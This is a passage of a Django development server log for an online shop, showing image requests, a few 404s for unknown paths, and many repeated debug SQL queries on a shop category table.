/media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:42] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:43] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:44] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [20/Dec/2019 05:38:44] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 Not Found: /robots.txt [20/Dec/2019 05:41:18] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [20/Dec/2019 05:41:40] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=184 HTTP/1.0" 404 6532 Not Found: /newslist.asp [20/Dec/2019 05:41:50] "GET /newslist.asp?type=4&id=1333 HTTP/1.0" 404 6476 [20/Dec/2019 05:43:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 05:48:36,745 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:48:36,752 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:48:36,756 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:48:36,759 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:48:36,762 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:48:36,764 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:48:36,766 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:48:36,769 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:48:36,771 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:48:36,775 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:48:36,777 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:48:36,779 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:48:36,782 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 05:48:36,784 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 05:48:36,787 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 05:48:36,789 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 05:48:36,792 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 05:48:36,794 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 05:48:36,797 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 05:48:36,800 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 05:48:36,803 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 05:48:36,805 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 05:48:36,807 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 05:48:36,809 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 05:48:36,812 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 05:48:36,815 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 05:48:36,818 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 05:48:36,820 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 05:48:36,822 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 05:48:36,825 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 05:48:36,828 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 05:48:36,830 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 05:48:36,833 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 05:48:36,835 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 05:48:36,838 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 05:48:36,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 05:48:36,844 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 05:48:36,847 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 05:48:36,849 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 05:48:36,851 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 05:48:36,854 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 05:48:36,856 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 05:48:36,859 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 05:48:36,861 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 05:48:36,864 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 05:48:36,866 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 05:48:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 05:48:55,030 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 05:48:55,037 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 05:48:55,041 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 05:48:55,044 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 05:48:55,049 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 05:48:55,052 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 05:48:55,057 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 05:48:55,060 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 05:48:55,063 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 05:48:55,068 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 05:48:55,073 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 05:48:55,077 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 05:48:55,080 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 